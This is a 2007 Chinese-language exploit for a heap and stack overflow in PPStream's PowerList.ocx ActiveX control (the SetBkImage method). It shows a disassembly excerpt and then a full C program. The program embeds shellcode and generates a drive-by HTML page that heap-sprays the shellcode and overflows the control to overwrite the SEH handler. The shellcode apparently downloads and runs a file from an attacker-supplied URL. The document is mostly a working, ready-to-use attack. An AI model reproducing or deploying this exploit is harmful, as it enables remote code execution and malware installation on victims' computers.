PPStream 2.1.16.1003 溢出问题

版本: PowerList.ocx 2.1.6.2920
.text:1003178C SetBkImage proc near ; CODE XREF: sub_100307EB+80Bp
.text:1003178C ; sub_10031B46+22p
.text:1003178C ; DATA XREF: .rdata:10040968o
.text:1003178C
.text:1003178C var_130 = dword ptr -130h
.text:1003178C
.text:1003178C mov eax, offset loc_1003E1EC
.text:10031791 call __EH_prolog
.text:10031791
.text:10031796 sub esp, 120h
.text:1003179C push ebx
.text:1003179D push esi
.text:1003179E push edi
.text:1003179F mov edi, [ebp+8]
.text:100317A2 mov esi, ecx
.text:100317A4 push edi ; lpString
.text:100317A5 call ds:lstrlenA
.text:100317AB xor ebx, ebx
.text:100317AD cmp edi, ebx
.text:100317AF jz loc_1003187D
.text:100317AF
.text:100317B5 cmp eax, 1
.text:100317B8 jl loc_1003187D
.text:100317B8
.text:100317BE cmp eax, 104h ;最新版本已经加了长度检查
.text:100317C3 jg loc_1003187D
.text:100317C3
.text:100317C9 lea ecx, [ebp-28h]
.text:100317CC call CFileFind::CFileFind(void)
.text:100317CC
.text:100317D1 push ebx
.text:100317D2 push edi
.text:100317D3 lea ecx, [ebp-28h]
.text:100317D6 mov [ebp-4], ebx
.text:100317D9 call CFileFind::FindFile(char const *,ulong)

/*
PPStream
PowerList.ocx
2.1.6.2916

描述:
SetBkImage 堆和栈溢出, 还是以前的老问题。以前补的是PowerPlayer.dll中的

这里利用堆溢出和栈溢出，使用 CFindFile 对参数检查不严格，导致堆溢出。
在其析构时会导致异常，并且在析构之前发生了 strcat 导致栈溢出，覆盖掉
原来的 seh 处理程序

author: dummyz@126.com

2007-11-11
*/

#define _CRT_SECURE_NO_DEPRECATE

#include <windows.h>
#include <stdio.h>

const unsigned char shellcode[174] =
{
 // 必须是偶数大小
 0xE8, 0x00, 0x00, 0x00, 0x00, 0x6A, 0x03, 0xEB, 0x21, 0x7E, 0xD8, 0xE2, 0x73, 0x98, 0xFE, 0x8A,
 0x0E, 0x8E, 0x4E, 0x0E, 0xEC, 0x55, 0x52, 0x4C, 0x4D, 0x4F, 0x4E, 0x00, 0x00, 0x36, 0x1A, 0x2F,
 0x70, 0x63, 0x3A, 0x5C, 0x63, 0x2E, 0x65, 0x78, 0x65, 0x00, 0x59, 0x5F, 0xAF, 0x67, 0x64, 0xA1,
 0x30, 0x00, 0x8B, 0x40, 0x0C, 0x8B, 0x70, 0x1C, 0xAD, 0x8B, 0x68, 0x08, 0x51, 0x8B, 0x75, 0x3C,
 0x8B, 0x74, 0x2E, 0x78, 0x03, 0xF5, 0x56, 0x8B, 0x76, 0x20, 0x03, 0xF5, 0x33, 0xC9, 0x49, 0x41,
 0xAD, 0x03, 0xC5, 0x33, 0xDB, 0x0F, 0xBE, 0x10, 0x38, 0xF2, 0x74, 0x08, 0xC1, 0xCB, 0x0D, 0x03,
 0xDA, 0x40, 0xEB, 0xF1, 0x3B, 0x1F, 0x75, 0xE7, 0x5E, 0x8B, 0x5E, 0x24, 0x03, 0xDD, 0x66, 0x8B,
 0x0C, 0x4B, 0x8B, 0x5E, 0x1C, 0x03, 0xDD, 0x8B, 0x04, 0x8B, 0x03, 0xC5, 0xAB, 0x59, 0xE2, 0xBC,
 0x8B, 0x0F, 0x80, 0xF9, 0x63, 0x74, 0x0A, 0x57, 0xFF, 0xD0, 0x95, 0xAF, 0xAF, 0x6A, 0x01, 0xEB,
 0xAC, 0x52, 0x52, 0x57, 0x8D, 0x8F, 0xDB, 0x10, 0x40, 0x00, 0x81, 0xE9, 0x4E, 0x10, 0x40, 0x00,
 0x51, 0x52, 0xFF, 0xD0, 0x6A, 0x01, 0x57, 0xFF, 0x57, 0xEC, 0xFF, 0x57, 0xE8, 0x90
};

const char* script1 = \
 "<html><body><object id=\"ppc\" classid=\"clsid:20C2C286-BDE8-441B-B73D-AFA22D914DA5\"></object><script>"
 "var shellcode = unescape(\"";
const char* script2 = \
 "\");"
 "fillblock = unescape(\"%u9090邐\");"
 "while ( fillblock.length < 0x30000 ) fillblock += fillblock;"
 "memory = new Array();"
 "for ( x = 0; x < 400; x++ ) memory[x] = fillblock + shellcode;"
 "var buffer = '\\x0a\\x0a\\x0a\\x0a';"
 "while (buffer.length < 300) buffer += '\\x0a\\x0a\\x0a\\x0a';"
 "ppc.SetBkImage(buffer);"
 "</script>"
 "</body>"
 "</html>"
 "</script>"
 "</body>"
 "</html>";

int main(int argc, char* argv[])
{
 if ( argc != 2 )
 {
 printf("ex:fuckpps url\nwritten by dummyz@126.com (2007)\n");
 return -1;
 }

 FILE *file = fopen("fuckpps.html", "w+");
 if ( file == NULL )
 {
 printf("create 'fuckpps.html' failed!\n");
 return -2;
 }

 fprintf(file, "%s", script1);
 for ( unsigned i = 0; i < sizeof (shellcode); i += 2 )
 fprintf(file, "%%u%02X%02X" , shellcode[i + 1], shellcode[i]);
 
 const unsigned l = strlen(argv[1]);
 for ( unsigned j = 0; j < l; j += 2 )
 fprintf(file, "%%u%02X%02X" , argv[1][j + 1], argv[1][j]);

 fprintf(file, "%s", script2);
 fclose(file);

 printf("make 'fuckpps.html' successed!\n");

 return 0;
}